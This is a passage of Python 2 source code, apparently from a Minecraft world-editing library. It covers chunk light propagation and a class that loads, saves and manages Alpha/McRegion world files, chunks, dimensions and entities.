for ch in list(dirtyChunks):
#relight all blocks in neighboring chunks in case their light source disappeared.
cx, cz = ch.chunkPosition
for dx, dz in itertools.product((-1, 0, 1), (-1, 0, 1)):
try:
ch = self.getChunk (cx + dx, cz + dz)
except (ChunkNotPresent, ChunkMalformed):
continue
dirtyChunks.add(ch);
dirtyChunks = sorted(dirtyChunks, key=lambda x:x.chunkPosition)
workTotal += len(dirtyChunks) * 28
for i, chunk in enumerate(dirtyChunks):
chunk.BlockLight[:] = self.materials.lightEmission[chunk.Blocks];
chunk.dirty = True
if conserveMemory:
chunk.compress();
zeroChunk = ZeroChunk(self.Height)
zeroChunk.BlockLight[:] = 0;
zeroChunk.SkyLight[:] = 0;
startingDirtyChunks = dirtyChunks
oldLeftEdge = zeros((1, 16, self.Height), 'uint8');
oldBottomEdge = zeros((16, 1, self.Height), 'uint8');
oldChunk = zeros((16, 16, self.Height), 'uint8');
if self.dimNo in (-1, 1):
lights = ("BlockLight",)
else:
lights = ("BlockLight", "SkyLight")
info(u"Dispersing light...")
def clipLight(light):
#light arrays are all uint8 by default, so when results go negative
#they become large instead. reinterpret as signed int using view()
#and then clip to range
light.view('int8').clip(0, 15, light)
for j, light in enumerate(lights):
zerochunkLight = getattr(zeroChunk, light);
newDirtyChunks = list(startingDirtyChunks);
work = 0
for i in range(14):
if len(newDirtyChunks) == 0:
workTotal -= len(startingDirtyChunks) * (14 - i)
break
progressInfo = u"{0} Pass {1}: {2} chunks".format(light, i, len(newDirtyChunks))
info(progressInfo)
"""
propagate light!
for each of the six cardinal directions, figure a new light value for
adjoining blocks by reducing this chunk's light by light absorption and fall off.
compare this new light value against the old light value and update with the maximum.
we calculate all chunks one step before moving to the next step, to ensure all gaps at chunk edges are filled.
we do an extra cycle because lights sent across edges may lag by one cycle.
xxx this can be optimized by finding the highest and lowest blocks
that changed after one pass, and only calculating changes for that
vertical slice on the next pass. newDirtyChunks would have to be a
list of (cPos, miny, maxy) tuples or a cPos : (miny, maxy) dict
"""
newDirtyChunks = set(newDirtyChunks)
newDirtyChunks.discard(zeroChunk)
dirtyChunks = sorted(newDirtyChunks, key=lambda x:x.chunkPosition)
newDirtyChunks = list();
for chunk in dirtyChunks:
(cx, cz) = chunk.chunkPosition
neighboringChunks = {};
try:
chunk.load();
except (ChunkNotPresent, ChunkMalformed), e:
print "Chunk error during relight, chunk skipped: ", e
continue;
for dir, dx, dz in ((FaceXDecreasing, -1, 0),
(FaceXIncreasing, 1, 0),
(FaceZDecreasing, 0, -1),
(FaceZIncreasing, 0, 1)):
try:
neighboringChunks[dir] = self.getChunk(cx + dx, cz + dz)
except (ChunkNotPresent, ChunkMalformed):
neighboringChunks[dir] = zeroChunk;
chunkLa = la[chunk.Blocks];
chunkLight = getattr(chunk, light);
oldChunk[:] = chunkLight[:]
### Spread light toward -X
nc = neighboringChunks[FaceXDecreasing]
ncLight = getattr(nc, light);
oldLeftEdge[:] = ncLight[15:16, :, 0:self.Height] #save the old left edge
#left edge
newlight = (chunkLight[0:1, :, :self.Height] - la[nc.Blocks[15:16, :, 0:self.Height]])
clipLight(newlight)
maximum(ncLight[15:16, :, 0:self.Height], newlight, ncLight[15:16, :, 0:self.Height])
#chunk body
newlight = (chunkLight[1:16, :, 0:self.Height] - chunkLa[0:15, :, 0:self.Height])
clipLight(newlight)
maximum(chunkLight[0:15, :, 0:self.Height], newlight, chunkLight[0:15, :, 0:self.Height])
#right edge
nc = neighboringChunks[FaceXIncreasing]
ncLight = getattr(nc, light);
newlight = ncLight[0:1, :, :self.Height] - chunkLa[15:16, :, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[15:16, :, 0:self.Height], newlight, chunkLight[15:16, :, 0:self.Height])
### Spread light toward +X
#right edge
nc = neighboringChunks[FaceXIncreasing]
ncLight = getattr(nc, light);
newlight = (chunkLight[15:16, :, 0:self.Height] - la[nc.Blocks[0:1, :, 0:self.Height]])
clipLight(newlight)
maximum(ncLight[0:1, :, 0:self.Height], newlight, ncLight[0:1, :, 0:self.Height])
#chunk body
newlight = (chunkLight[0:15, :, 0:self.Height] - chunkLa[1:16, :, 0:self.Height])
clipLight(newlight)
maximum(chunkLight[1:16, :, 0:self.Height], newlight, chunkLight[1:16, :, 0:self.Height])
#left edge
nc = neighboringChunks[FaceXDecreasing]
ncLight = getattr(nc, light);
newlight = ncLight[15:16, :, :self.Height] - chunkLa[0:1, :, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[0:1, :, 0:self.Height], newlight, chunkLight[0:1, :, 0:self.Height])
zerochunkLight[:] = 0; #zero the zero chunk after each direction
# so the lights it absorbed don't affect the next pass
#check if the left edge changed and dirty or compress the chunk appropriately
if (oldLeftEdge != ncLight[15:16, :, :self.Height]).any():
#chunk is dirty
newDirtyChunks.append(nc)
### Spread light toward -Z
#bottom edge
nc = neighboringChunks[FaceZDecreasing]
ncLight = getattr(nc, light);
oldBottomEdge[:] = ncLight[:, 15:16, :self.Height] # save the old bottom edge
newlight = (chunkLight[:, 0:1, :self.Height] - la[nc.Blocks[:, 15:16, :self.Height]])
clipLight(newlight)
maximum(ncLight[:, 15:16, :self.Height], newlight, ncLight[:, 15:16, :self.Height])
#chunk body
newlight = (chunkLight[:, 1:16, :self.Height] - chunkLa[:, 0:15, :self.Height])
clipLight(newlight)
maximum(chunkLight[:, 0:15, :self.Height], newlight, chunkLight[:, 0:15, :self.Height])
#top edge
nc = neighboringChunks[FaceZIncreasing]
ncLight = getattr(nc, light);
newlight = ncLight[:, 0:1, :self.Height] - chunkLa[:, 15:16, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[:, 15:16, 0:self.Height], newlight, chunkLight[:, 15:16, 0:self.Height])
### Spread light toward +Z
#top edge
nc = neighboringChunks[FaceZIncreasing]
ncLight = getattr(nc, light);
newlight = (chunkLight[:, 15:16, :self.Height] - la[nc.Blocks[:, 0:1, :self.Height]])
clipLight(newlight)
maximum(ncLight[:, 0:1, :self.Height], newlight, ncLight[:, 0:1, :self.Height])
#chunk body
newlight = (chunkLight[:, 0:15, :self.Height] - chunkLa[:, 1:16, :self.Height])
clipLight(newlight)
maximum(chunkLight[:, 1:16, :self.Height], newlight, chunkLight[:, 1:16, :self.Height])
#bottom edge
nc = neighboringChunks[FaceZDecreasing]
ncLight = getattr(nc, light);
newlight = ncLight[:, 15:16, :self.Height] - chunkLa[:, 0:1, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[:, 0:1, 0:self.Height], newlight, chunkLight[:, 0:1, 0:self.Height])
zerochunkLight[:] = 0;
if (oldBottomEdge != ncLight[:, 15:16, :self.Height]).any():
newDirtyChunks.append(nc)
newlight = (chunkLight[:, :, 0:self.Height - 1] - chunkLa[:, :, 1:self.Height])
clipLight(newlight)
maximum(chunkLight[:, :, 1:self.Height], newlight, chunkLight[:, :, 1:self.Height])
newlight = (chunkLight[:, :, 1:self.Height] - chunkLa[:, :, 0:self.Height - 1])
clipLight(newlight)
maximum(chunkLight[:, :, 0:self.Height - 1], newlight, chunkLight[:, :, 0:self.Height - 1])
if (oldChunk != chunkLight).any():
newDirtyChunks.append(chunk);
work += 1
yield workDone + work, workTotal, progressInfo
workDone += work
workTotal -= len(startingDirtyChunks)
workTotal += work
work = 0
for ch in startingDirtyChunks:
ch.needsLighting = False;
class MCInfdevOldLevel(ChunkedLevelMixin, EntityLevel):
    """An infinite ("Infdev"/Alpha format) Minecraft world backed by a world
    directory containing level.dat plus chunk data, stored either as
    per-chunk c.<x>.<z>.dat files (old format) or as McRegion r.<x>.<z>.mcr
    region files (level.dat version tag 19132)."""

    materials = alphaMaterials;
    isInfinite = True
    parentWorld = None;     # set on dimensions; None for the top-level world
    dimNo = 0;              # dimension number (0 = overworld)
    Height = 128

    @property
    def displayName(self):
        # The world is named after its folder, not the level.dat file inside it.
        #shortname = os.path.basename(self.filename);
        #if shortname == "level.dat":
        shortname = os.path.basename(os.path.dirname(self.filename))
        return shortname

    @classmethod
    def _isLevel(cls, filename):
        """Return True if filename looks like an Alpha world folder or its
        level.dat / level.dat_old file."""
        join = os.path.join
        exists = os.path.exists
        if exists(join(filename, "chunks.dat")): return False # exclude Pocket Edition folders

        if not os.path.isdir(filename):
            f = os.path.basename(filename)
            if f not in ("level.dat", "level.dat_old"): return False
            filename = os.path.dirname(filename)

        files = os.listdir(filename);
        if "level.dat" in files or "level.dat_old" in files:
            return True;

        return False

    def getWorldBounds(self):
        """Bounding box covering every chunk present in the world.
        May initiate a costly chunk scan (via chunkCount/allChunks)."""
        if self.chunkCount == 0:
            return BoundingBox((0, 0, 0), (0, 0, 0))

        allChunksArray = array(list(self.allChunks), dtype='int32')
        mincx = min(allChunksArray[:, 0])
        maxcx = max(allChunksArray[:, 0])
        mincz = min(allChunksArray[:, 1])
        maxcz = max(allChunksArray[:, 1])

        origin = (mincx << 4, 0, mincz << 4)
        size = ((maxcx - mincx + 1) << 4, self.Height, (maxcz - mincz + 1) << 4)

        return BoundingBox(origin, size)

    def __str__(self):
        return "MCInfdevOldLevel(\"" + os.path.split(self.worldDir)[1] + "\")"

    def TagProperty(tagName, tagType, defaultValueFunc=lambda self:None):
        # Class-scope property factory (not a method): builds a property that
        # reads/writes the named tag under root_tag[Data], creating it from
        # defaultValueFunc on first read if missing.
        def getter(self):
            if tagName not in self.root_tag[Data]:
                self.root_tag[Data][tagName] = tagType(defaultValueFunc(self))
            return self.root_tag[Data][tagName].value

        def setter(self, val):
            self.root_tag[Data][tagName] = tagType(value=val)

        return property(getter, setter)

    SizeOnDisk = TagProperty('SizeOnDisk', TAG_Long)
    RandomSeed = TagProperty('RandomSeed', TAG_Long)
    Time = TagProperty('Time', TAG_Long); """ Age of the world in ticks. 20 ticks per second; 24000 ticks per day."""
    LastPlayed = TagProperty('LastPlayed', TAG_Long, lambda self:long(time.time() * 1000))

    LevelName = TagProperty('LevelName', TAG_String, lambda self:self.displayName)

    MapFeatures = TagProperty('MapFeatures', TAG_Byte, lambda self:1)

    GameType = TagProperty('GameType', TAG_Int, lambda self:0) #0 for survival, 1 for creative

    GAMETYPE_SURVIVAL = 0
    GAMETYPE_CREATIVE = 1

    # cached world bounds; reset to None whenever chunks are created/deleted
    _bounds = None

    @property
    def bounds(self):
        if self._bounds is None: self._bounds = self.getWorldBounds();
        return self._bounds

    @property
    def size(self):
        return self.bounds.size

    def close(self):
        """Release all region file handles and drop all chunk caches."""
        for rf in (self.regionFiles or {}).values():
            rf.close();

        self.regionFiles = {}

        self._allChunks = None
        self._loadedChunks = {}

    def create(self, filename, random_seed, last_played):
        """Build a fresh level.dat tag tree for a new world and create the
        world folder if needed.  Raises ValueError without a filename."""
        if filename == None:
            raise ValueError, "Can't create an Infinite level without a filename!"

        #create a new level
        root_tag = TAG_Compound();
        root_tag[Data] = TAG_Compound();
        root_tag[Data][SpawnX] = TAG_Int(0)
        root_tag[Data][SpawnY] = TAG_Int(2)
        root_tag[Data][SpawnZ] = TAG_Int(0)

        if last_played is None:
            last_played = long(time.time() * 1000)
        if random_seed is None:
            # random signed 64-bit seed
            random_seed = long(random.random() * 0xffffffffffffffffL) - 0x8000000000000000L

        self.root_tag = root_tag;
        # version 19132 marks the McRegion chunk storage format
        root_tag[Data]['version'] = TAG_Int(19132)

        self.LastPlayed = long(last_played)
        self.RandomSeed = long(random_seed)
        self.SizeOnDisk = 0
        self.Time = 1
        self.LevelName = os.path.basename(self.worldDir)

        ### if singleplayer:
        self.createPlayer("Player")

        if not os.path.exists(self.worldDir):
            os.mkdir(self.worldDir)

    def createPlayer(self, playerName):
        """Create a default player tag (full health, at the spawn column) for
        playerName.  "Player" lives inside level.dat; other players get their
        own .dat file."""
        if playerName == "Player":
            playerTag = self.root_tag[Data].setdefault(playerName, TAG_Compound())
        else:
            playerTag = TAG_Compound()

        playerTag['Air'] = TAG_Short(300);
        playerTag['AttackTime'] = TAG_Short(0)
        playerTag['DeathTime'] = TAG_Short(0);
        playerTag['Fire'] = TAG_Short(-20);
        playerTag['Health'] = TAG_Short(20);
        playerTag['HurtTime'] = TAG_Short(0);
        playerTag['Score'] = TAG_Int(0);
        playerTag['FallDistance'] = TAG_Float(0)
        playerTag['OnGround'] = TAG_Byte(0)

        playerTag['Inventory'] = TAG_List()

        playerTag['Motion'] = TAG_List([TAG_Double(0) for i in range(3)])
        playerTag['Pos'] = TAG_List([TAG_Double([0.5, 2.8, 0.5][i]) for i in range(3)])
        playerTag['Rotation'] = TAG_List([TAG_Float(0), TAG_Float(0)])

        if playerName != "Player":
            # NOTE(review): playerTagCache is a plain dict and has no .save();
            # this branch looks broken — presumably the intent was to save
            # playerTag to getPlayerPath(playerName). TODO confirm.
            self.playerTagCache.save(self.getPlayerPath(playerName))

    def __init__(self, filename=None, create=False, random_seed=None, last_played=None):
        """
        Load an Alpha level from the given filename. It can point to either
        a level.dat or a folder containing one. If create is True, it will
        also create the world using the random_seed and last_played arguments.
        If they are none, a random 64-bit seed will be selected for RandomSeed
        and long(time.time()*1000) will be used for LastPlayed.

        If you try to create an existing world, its level.dat will be replaced.
        """
        self.Length = 0
        self.Width = 0
        self.Height = 128 #subject to change?
        self.playerTagCache = {}    # player .dat path -> loaded NBT tag
        self.players = []

        if not os.path.exists(filename):
            if not create:
                raise IOError, 'File not found'

            self.worldDir = filename
            os.mkdir(self.worldDir)

        if os.path.isdir(filename):
            self.worldDir = filename
        else:
            if os.path.basename(filename) in ("level.dat", "level.dat_old"):
                self.worldDir = os.path.dirname(filename)
            else:
                raise IOError, 'File is not a Minecraft Alpha world'

        self.filename = os.path.join(self.worldDir, "level.dat")
        self.regionDir = os.path.join(self.worldDir, "region")
        if not os.path.exists(self.regionDir):
            os.mkdir(self.regionDir)

        #maps (cx,cz) pairs to InfdevChunks
        self._loadedChunks = {}
        self._allChunks = None      # set of (cx, cz) positions, or None until scanned
        self.dimensions = {};
        self.regionFiles = {}

        #used to limit memory usage
        self.loadedChunkQueue = dequeset()
        self.decompressedChunkQueue = dequeset()

        self.loadLevelDat(create, random_seed, last_played);

        #attempt to support yMod
        try:
            self.Height = self.root_tag["Data"]["YLimit"].value
        except:
            pass

        self.playersDir = os.path.join(self.worldDir, "players");

        if os.path.isdir(self.playersDir):
            self.players = [x[:-4] for x in os.listdir(self.playersDir) if x.endswith(".dat")]
        if "Player" in self.root_tag["Data"]:
            self.players.append("Player")

        self.preloadDimensions();
        #self.preloadChunkPositions();

    def __del__(self):
        self.close()

    def loadLevelDat(self, create=False, random_seed=None, last_played=None):
        """Load level.dat, falling back to level.dat_old and finally to a
        freshly created level if both are unreadable."""
        if create:
            self.create(self.filename, random_seed, last_played);
            self.saveInPlace();
        else:
            try:
                self.root_tag = nbt.load(self.filename)
            except Exception, e:
                filename_old = os.path.join(self.worldDir, "level.dat_old")
                info("Error loading level.dat, trying level.dat_old ({0})".format(e))
                try:
                    self.root_tag = nbt.load(filename_old)
                    info("level.dat restored from backup.")
                    self.saveInPlace();
                except Exception, e:
                    traceback.print_exc()
                    print repr(e)
                    info("Error loading level.dat_old. Initializing with defaults.");
                    self.create(self.filename, random_seed, last_played);

    def preloadDimensions(self):
        """Scan the world folder for DIM* subfolders and register each as an
        MCAlphaDimension keyed by its dimension number."""
        worldDirs = os.listdir(self.worldDir);

        for dirname in worldDirs :
            if dirname.startswith("DIM"):
                try:
                    dimNo = int(dirname[3:]);
                    info("Found dimension {0}".format(dirname))
                    dim = MCAlphaDimension(self, dimNo);
                    self.dimensions[dimNo] = dim;
                except Exception, e:
                    error(u"Error loading dimension {0}: {1}".format(dirname, e))

    def getDimension(self, dimNo):
        """Return the dimension with the given number, creating it on demand.
        Lookup is always resolved through the parent (overworld) level."""
        if self.dimNo != 0:
            return self.parentWorld.getDimension(dimNo)

        if dimNo == 0:
            return self
        if dimNo in self.dimensions: return self.dimensions[dimNo]
        dim = MCAlphaDimension(self, dimNo, create=True)
        self.dimensions[dimNo] = dim
        return dim

    def getRegionForChunk(self, cx, cz):
        # each region file holds a 32x32 block of chunks
        rx = cx >> 5
        rz = cz >> 5
        return self.getRegionFile(rx, rz)

    def preloadChunkPositions(self):
        # version 19132 => McRegion format; otherwise per-chunk .dat files
        if self.version == 19132:
            self.preloadRegions()
        else:
            self.preloadChunkPaths()

    def findRegionFiles(self):
        """Yield the path of every file in the region/ subfolder,
        creating the folder if absent."""
        regionDir = os.path.join(self.worldDir, "region")
        if not os.path.exists(regionDir):
            os.mkdir(regionDir)

        regionFiles = os.listdir(regionDir)
        for filename in regionFiles:
            yield os.path.join(regionDir, filename)

    def loadRegionFile(self, filepath):
        """Open filepath as an MCRegionFile if it is named like
        r.<x>.<z>.mcr; otherwise return None."""
        filename = os.path.basename(filepath)
        bits = filename.split('.')
        if len(bits) < 4 or bits[0] != 'r' or bits[3] != "mcr": return None

        try:
            rx, rz = map(int, bits[1:3])
        except ValueError:
            return None

        return MCRegionFile(filepath, (rx, rz))

    def getRegionFile(self, rx, rz):
        """Return the (cached) region file at region coords (rx, rz),
        creating the file if it does not exist yet."""
        regionFile = self.regionFiles.get((rx, rz))
        if regionFile: return regionFile
        regionFile = MCRegionFile(self.regionFilename(rx, rz), (rx, rz))
        self.regionFiles[rx, rz] = regionFile;
        return regionFile

    def unloadRegions(self):
        self.close()

    def preloadRegions(self):
        """Populate _allChunks by reading the chunk offset table of every
        region file; empty region files are deleted on sight."""
        info(u"Scanning for regions...")
        self._allChunks = set()

        for filepath in self.findRegionFiles():
            regionFile = self.loadRegionFile(filepath)
            if regionFile is None: continue
            if regionFile.offsets.any():
                rx, rz = regionFile.regionCoords
                self.regionFiles[rx, rz] = regionFile

                for index, offset in enumerate(regionFile.offsets):
                    if offset:
                        # offset table index encodes local chunk coords: cz*32+cx
                        cx = index & 0x1f
                        cz = index >> 5

                        cx += rx << 5
                        cz += rz << 5

                        self._allChunks.add((cx, cz))
            else:
                info(u"Removing empty region file {0}".format(filepath))
                regionFile.close()
                os.unlink(regionFile.path)

    def preloadChunkPaths(self):
        """Populate _allChunks by walking the two-level base36 dirhash folder
        tree for c.<x>.<z>.dat chunk files (pre-McRegion worlds)."""
        info(u"Scanning for chunks...")
        worldDirs = os.listdir(self.worldDir);
        self._allChunks = set()

        for dirname in worldDirs:
            if(dirname in self.dirhashes):
                subdirs = os.listdir(os.path.join(self.worldDir, dirname));
                for subdirname in subdirs:
                    if(subdirname in self.dirhashes):
                        filenames = os.listdir(os.path.join(self.worldDir, dirname, subdirname));
                        #def fullname(filename):
                            #return os.path.join(self.worldDir, dirname, subdirname, filename);

                        #fullpaths = map(fullname, filenames);
                        bits = map(lambda x:x.split('.'), filenames);

                        chunkfilenames = filter(lambda x:(len(x) == 4 and x[0].lower() == 'c' and x[3].lower() == 'dat'), bits)

                        for c in chunkfilenames:
                            try:
                                cx, cz = (decbase36(c[1]), decbase36(c[2]))
                            except Exception, e:
                                info(u'Skipped file {0} ({1})'.format(u'.'.join(c), e))
                                continue

                            self._allChunks.add((cx, cz))

            #

        info(u"Found {0} chunks.".format(len(self._allChunks)))

    def compress(self):
        self.compressAllChunks();

    def compressAllChunks(self):
        for ch in self._loadedChunks.itervalues():
            ch.compress();

    def compressChunk(self, cx, cz):
        if not (cx, cz) in self._loadedChunks: return; #not an error
        self._loadedChunks[cx, cz].compress()

    # caps for the two memory-limiting queues maintained below
    decompressedChunkLimit = 2048 # about 320 megabytes
    loadedChunkLimit = 8192 # from 8mb to 800mb depending on chunk contents

    def chunkDidCompress(self, chunk):
        self.decompressedChunkQueue.discard(chunk)

    def chunkDidDecompress(self, chunk):
        # Track decompressed chunks; recompress the oldest when over the limit.
        if not chunk in self.decompressedChunkQueue:
            self.decompressedChunkQueue.append(chunk);
            if self.decompressedChunkLimit and (len(self.decompressedChunkQueue) > self.decompressedChunkLimit):
                oldestChunk = self.decompressedChunkQueue[0];
                oldestChunk.compress(); #calls chunkDidCompress

    def chunkDidUnload(self, chunk):
        self.loadedChunkQueue.discard(chunk)

    def chunkDidLoad(self, chunk):
        # Track loaded chunks; unload the oldest when over the limit.
        if chunk not in self.loadedChunkQueue:
            self.loadedChunkQueue.append(chunk);
            if self.loadedChunkLimit and (len(self.loadedChunkQueue) > self.loadedChunkLimit):
                oldestChunk = self.loadedChunkQueue[0];
                oldestChunk.unload(); #calls chunkDidUnload

    @property
    @decompress_first
    def version(self):
        # level.dat 'version' tag: 19132 for McRegion worlds, None for older.
        if 'version' in self.root_tag['Data']:
            return self.root_tag['Data']['version'].value
        else:
            return None

    @version.setter
    @decompress_first
    def version(self, val):
        if 'version' in self.root_tag['Data']:
            self.root_tag['Data']['version'].value = val

    @version.deleter
    @decompress_first
    def version(self):
        self.root_tag['Data'].pop('version')

    def _loadChunk(self, chunk):
        """ load the chunk data from disk, and set the chunk's compressedTag
        and root_tag"""
        cx, cz = chunk.chunkPosition
        try:
            if self.version:
                regionFile = self.getRegionForChunk(cx, cz)
                regionFile.loadChunk(chunk)

            else:
                # old format: each chunk is its own gzipped NBT file
                with file(chunk.filename, 'rb') as f:
                    cdata = f.read()
                    chunk.compressedTag = cdata
                    data = gunzip(cdata)
                    chunk.root_tag = nbt.load(buf=data)

        except Exception, e:
            # re-raise with the original traceback attached
            raise ChunkMalformed, "Chunk {0} had an error: {1!r}".format(chunk.chunkPosition, e), sys.exc_info()[2]

    def _saveChunk(self, chunk):
        """Write the chunk back to disk, via its region file or as its own
        gzipped file depending on the world's format version."""
        cx, cz = chunk.chunkPosition
        if self.version:
            regionFile = self.getRegionForChunk(cx, cz)
            regionFile.saveChunk(chunk)

        else:
            # ensure both levels of the dirhash folder tree exist
            dir1 = os.path.dirname(chunk.filename)
            dir2 = os.path.dirname(dir1)

            if not os.path.exists(dir2):
                os.mkdir(dir2)
            if not os.path.exists(dir1):
                os.mkdir(dir1)

            chunk.compress()
            with file(chunk.filename, 'wb') as f:
                f.write(chunk.compressedTag)

    def discardAllChunks(self):
        """ clear lots of memory, fast. """
        # NOTE(review): not implemented — body is empty.

    def chunkFilenameAt(self, x, y, z):
        cx = x >> 4
        cz = z >> 4
        return self._loadedChunks.get((cx, cz)).filename

    def dirhash(self, n):
        return self.dirhashes[n % 64];

    def _dirhash(self):
        # NOTE: despite the name, 'self' here is an integer; this is called as
        # a plain function by the class-level list comprehension below.
        n = self
        n = n % 64;
        s = u"";
        if(n >= 36):
            s += u"1";
            n -= 36;
        s += u"0123456789abcdefghijklmnopqrstuvwxyz"[n]

        return s;

    # precomputed base36-ish folder names "0".."z", "10".."1r"
    dirhashes = [_dirhash(n) for n in range(64)];

    def regionFilename(self, rx, rz):
        s = os.path.join(self.regionDir,
                         "r.%s.%s.mcr" % ((rx), (rz)));
        return s;

    def chunkFilename(self, x, z):
        s = os.path.join(self.worldDir, self.dirhash(x), self.dirhash(z),
                         "c.%s.%s.dat" % (base36(x), base36(z)));
        return s;

    def extractChunksInBox(self, box, parentFolder):
        for cx, cz in box.chunkPositions:
            if self.containsChunk(cx, cz):
                self.extractChunk(cx, cz, parentFolder)

    def extractChunk(self, cx, cz, parentFolder):
        """Write one chunk out as a standalone gzipped c.<x>.<z>.dat file in
        parentFolder, converting from zlib region storage if needed."""
        if not os.path.exists(parentFolder):
            os.mkdir(parentFolder)

        chunkFilename = self.chunkFilename(cx, cz)
        outputFile = os.path.join(parentFolder, os.path.basename(chunkFilename))

        chunk = self.getChunk(cx, cz)
        if chunk.compressMode == MCRegionFile.VERSION_GZIP:
            chunk.compress()
            data = chunk.compressedTag;
        else:
            chunk.decompress()
            chunk.packChunkData()
            data = chunk.compressTagGzip(chunk.root_tag)

        with file(outputFile, "wb") as f:
            f.write(data)

    def heightMapAt(self, x, z):
        zc = z >> 4
        xc = x >> 4
        xInChunk = x & 0xf;
        zInChunk = z & 0xf;

        ch = self.getChunk(xc, zc)

        heightMap = ch.HeightMap

        return heightMap[zInChunk, xInChunk];
        #the heightmap is ordered differently because in minecraft it is a flat array

    @property
    def loadedChunks(self):
        return self._loadedChunks.keys();

    @property
    def chunkCount(self):
        """Returns the number of chunks in the level. May initiate a costly
        chunk scan."""
        if self._allChunks is None:
            self.preloadChunkPositions()
        return len(self._allChunks)

    @property
    def allChunks(self):
        """Iterates over (xPos, zPos) tuples, one for each chunk in the level.
        May initiate a costly chunk scan."""
        if self._allChunks is None:
            self.preloadChunkPositions()
        return self._allChunks.__iter__();

    def _getChunkUnloaded(self, cx, cz):
        """return the InfdevChunk object at the given position. because loading
        the chunk is done later, accesses to chunk attributes may
        raise ChunkMalformed"""
        if not self.containsChunk(cx, cz) :
            raise ChunkNotPresent, (cx, cz);

        if not (cx, cz) in self._loadedChunks:
            self._loadedChunks[cx, cz] = InfdevChunk(self, (cx, cz));

        return self._loadedChunks[cx, cz]

    def chunkIsLoaded(self, cx, cz):
        if (cx, cz) in self._loadedChunks:
            return self._loadedChunks[(cx, cz)].isLoaded()

        return False

    def chunkIsCompressed(self, cx, cz):
        if (cx, cz) in self._loadedChunks:
            return self._loadedChunks[(cx, cz)].isCompressed()

        return False

    def chunkIsDirty(self, cx, cz):
        if (cx, cz) in self._loadedChunks:
            return self._loadedChunks[(cx, cz)].dirty

        return False

    def getChunk(self, cx, cz):
        """ read the chunk from disk, load it, and return it.
        decompression and unpacking is done lazily."""

        c = self._getChunkUnloaded(cx, cz)
        c.load();
        if not (cx, cz) in self._loadedChunks:
            raise ChunkMalformed, "Chunk {0} malformed".format((cx, cz))
            # NOTE(review): unreachable dead code — the raise above always
            # fires first, and neither self.world nor self.chunkPosition
            # exists on this class. TODO remove or fix.
            self.world.malformedChunk(*self.chunkPosition);

        return c;

    def markDirtyChunk(self, cx, cz):
        if not (cx, cz) in self._loadedChunks: return
        self._loadedChunks[cx, cz].chunkChanged();

    def markDirtyBox(self, box):
        for cx, cz in box.chunkPositions:
            self.markDirtyChunk(cx, cz)

    def saveInPlace(self):
        """Save all dimensions, all dirty chunks, cached player tags, and
        level.dat back to the world folder."""
        for level in self.dimensions.itervalues():
            level.saveInPlace(True);

        dirtyChunkCount = 0;
        if self._loadedChunks:
            for chunk in self._loadedChunks.itervalues():
                if chunk.dirty:
                    dirtyChunkCount += 1;
                    chunk.save();

        for path, tag in self.playerTagCache.iteritems():
            tag.saveGzipped(path)
        self.playerTagCache = {}

        self.root_tag.save(self.filename);
        info(u"Saved {0} chunks".format(dirtyChunkCount))

    def addEntity(self, entityTag):
        """Add an entity tag to whichever chunk contains its position;
        silently returns None if the chunk is missing or malformed."""
        assert isinstance(entityTag, TAG_Compound)
        x, y, z = map(lambda x:int(floor(x)), Entity.pos(entityTag))

        try:
            chunk = self.getChunk(x >> 4, z >> 4)
        except (ChunkNotPresent, ChunkMalformed), e:
            return None
            # raise Error, can't find a chunk?
        chunk.addEntity(entityTag);
        chunk.dirty = True

    def tileEntityAt(self, x, y, z):
        chunk = self.getChunk(x >> 4, z >> 4)
        return chunk.tileEntityAt(x, y, z)

    def addTileEntity(self, tileEntityTag):
        """Add a tile entity tag to whichever chunk contains its position;
        silently returns if the chunk is missing or malformed."""
        assert isinstance(tileEntityTag, TAG_Compound)
        if not 'x' in tileEntityTag: return
        x, y, z = TileEntity.pos(tileEntityTag)

        try:
            chunk = self.getChunk(x >> 4, z >> 4)
        except (ChunkNotPresent, ChunkMalformed):
            return
            # raise Error, can't find a chunk?
        chunk.addTileEntity(tileEntityTag)
        chunk.dirty = True

    def getEntitiesInBox(self, box):
        entities = []
        for chunk, slices, point in self.getChunkSlices(box):
            entities += chunk.getEntitiesInBox(box)

        return entities

    def removeEntitiesInBox(self, box):
        count = 0;
        for chunk, slices, point in self.getChunkSlices(box):
            count += chunk.removeEntitiesInBox(box);

        info("Removed {0} entities".format(count))
        return count;

    def removeTileEntitiesInBox(self, box):
        count = 0;
        for chunk, slices, point in self.getChunkSlices(box):
            count += chunk.removeTileEntitiesInBox(box);

        info("Removed {0} tile entities".format(count))
        return count;

    def containsPoint(self, x, y, z):
        if y < 0 or y > 127: return False;
        return self.containsChunk(x >> 4, z >> 4)

    def containsChunk(self, cx, cz):
        # cheapest checks first: chunk index, loaded cache, then disk
        if self._allChunks is not None: return (cx, cz) in self._allChunks;
        if (cx, cz) in self._loadedChunks: return True;

        if self.version:
            rx, rz = cx>>5, cz>>5
            if not os.path.exists(self.regionFilename(rx, rz)): return False

            return self.getRegionFile(rx,rz).containsChunk(cx, cz)
        else:
            return os.path.exists(self.chunkFilename(cx, cz))

    def malformedChunk(self, cx, cz):
        """Forget a chunk that failed to load and invalidate cached bounds."""
        debug(u"Forgetting malformed chunk {0} ({1})".format((cx, cz), self.chunkFilename(cx, cz)))
        if (cx, cz) in self._loadedChunks:
            del self._loadedChunks[(cx, cz)]

        self._bounds = None

    def createChunk(self, cx, cz):
        if self.containsChunk(cx, cz): raise ValueError, "{0}:Chunk {1} already present!".format(self, (cx, cz))
        if self._allChunks is not None:
            self._allChunks.add((cx, cz))

        self._loadedChunks[cx, cz] = InfdevChunk(self, (cx, cz), create=True)

        self._bounds = None

    def createChunks(self, chunks):
        """Create every not-yet-present chunk in the iterable of (cx, cz)
        positions; returns the list of positions actually created."""
        i = 0;
        ret = [];
        for cx, cz in chunks:
            i += 1;
            if not self.containsChunk(cx, cz):
                ret.append((cx, cz))
                self.createChunk(cx, cz);
                self.compressChunk(cx, cz);
                assert self.containsChunk(cx, cz), "Just created {0} but it didn't take".format((cx, cz))
            if i % 100 == 0:
                info(u"Chunk {0}...".format(i))

        info("Created {0} chunks.".format(len(ret)))

        return ret;

    def createChunksInBox(self, box):
        info(u"Creating {0} chunks in {1}".format((box.maxcx - box.mincx) * (box.maxcz - box.mincz), ((box.mincx, box.mincz), (box.maxcx, box.maxcz))))
        return self.createChunks(box.chunkPositions);

    def deleteChunk(self, cx, cz):
